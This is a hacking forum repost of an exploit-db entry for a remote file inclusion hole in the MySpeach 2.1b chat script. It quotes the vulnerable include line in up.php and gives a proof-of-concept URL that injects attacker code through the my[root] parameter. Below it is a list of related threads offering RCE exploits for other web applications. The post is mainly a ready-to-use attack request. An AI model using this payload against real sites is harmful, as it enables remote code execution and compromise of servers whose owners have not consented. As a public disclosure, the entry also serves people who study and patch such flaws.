Exploit MySpeach 2.1b - 'up.php' Remote File Inclusion

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3165
Проверка EDB
  1. Пройдено
Автор
3L3CTRIC-CRACKER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-0498 cve-2007-0491
Дата публикации
2007-01-20
Код: 
------------------------------------------------------------------------------------------------------------------------
Script:MySpeach
Affected Version:beta2.1 and maybe older
Downlaoad:http://www.graphiks.net/scripts/chat/myspeach-2.1beta.zip
------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------
Bug in (up.php)
Vul Code;
include_once($my['root'].'/admin/funcs.php');
------------------------------------------------------------------------------------------------------------------------
POC:
http://[target]/[path]/up.php?my[root]=[Bad Code]
------------------------------------------------------------------------------------------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2007-01-20]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit MySpeach 3.0.7 - Local/Remote File Inclusion
Ответы
0
Просмотры
268
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MySpeach 3.0.2 - 'my_ms[root]' Remote File Inclusion
Ответы
0
Просмотры
293
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
Ответы
0
Просмотры
2K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)
Ответы
1
Просмотры
1K
Эксплойты & Уязвимости
meselem
M
Exploiter
Exploit Webutler v3.2 - Remote Code Execution (RCE)
Ответы
0
Просмотры
611
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Ответы
0
Просмотры
594
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit SPIP v4.2.0 - Remote Code Execution (Unauthenticated)
Ответы
0
Просмотры
894
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
Ответы
0
Просмотры
603
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Best POS Management System v1.0 - Unauthenticated Remote Code Execution
Ответы
0
Просмотры
589
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit SitemagicCMS 4.4.3 - Remote Code Execution (RCE)
Ответы
0
Просмотры
597
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу